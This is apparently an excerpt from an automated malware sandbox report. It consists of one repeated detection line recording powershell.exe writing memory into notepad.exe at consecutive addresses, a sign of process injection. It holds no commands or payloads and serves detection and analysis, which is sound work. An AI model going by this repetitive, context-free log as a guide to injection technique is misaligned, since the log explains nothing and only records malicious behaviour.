              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500E1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500E2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500E3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500E4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500E5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500E6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500E7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500E8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500E9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500EAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500EBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500ECJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500EDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500EEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500EFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500F0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500F1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500F2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500F3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500F4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500F5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500F6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500F7Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500F8Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500F9Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500FAJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500FBJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500FCJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500FDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500FEJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F500FFJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50100Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50101Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50102Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50103Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50104Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50105Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50106Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50107Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50108Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50109Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5010AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5010BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5010CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5010DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5010EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5010FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50110Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50111Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50112Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50113Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50114Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50115Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50116Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50117Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50118Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50119Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5011AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5011BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5011CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5011DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5011EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5011FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50120Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50121Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50122Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50123Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50124Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50125Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50126Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50127Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50128Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50129Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5012AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5012BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5012CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5012DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5012EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5012FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50130Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50131Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50132Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50133Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50134Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50135Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50136Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50137Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50138Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50139Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5013AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5013BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5013CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5013DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5013EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5013FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50140Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50141Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50142Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50143Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50144Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50145Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50146Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50147Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50148Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50149Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5014AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5014BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5014CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5014DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5014EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5014FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50150Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50151Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50152Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50153Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50154Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50155Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50156Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50157Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50158Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50159Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5015AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5015BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5015CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5015DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5015EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5015FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50160Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50161Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50162Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50163Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50164Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50165Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50166Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50167Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50168Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50169Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5016AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5016BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5016CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5016DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5016EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5016FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50170Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50171Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50172Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50173Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50174Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50175Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50176Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50177Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50178Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50179Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5017AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5017BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5017CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5017DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5017EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5017FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50180Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50181Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50182Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50183Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50184Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50185Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50186Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50187Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50188Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50189Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5018AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5018BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5018CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5018DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5018EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5018FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50190Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50191Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50192Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50193Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50194Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50195Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50196Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50197Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50198Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F50199Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5019AJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5019BJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5019CJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5019DJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5019EJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F5019FJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501A0Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501A1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501A2Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501A3Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501A4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501A5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501A6Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\notepad.exe base: 1D8A2F501A7Jump to behavior
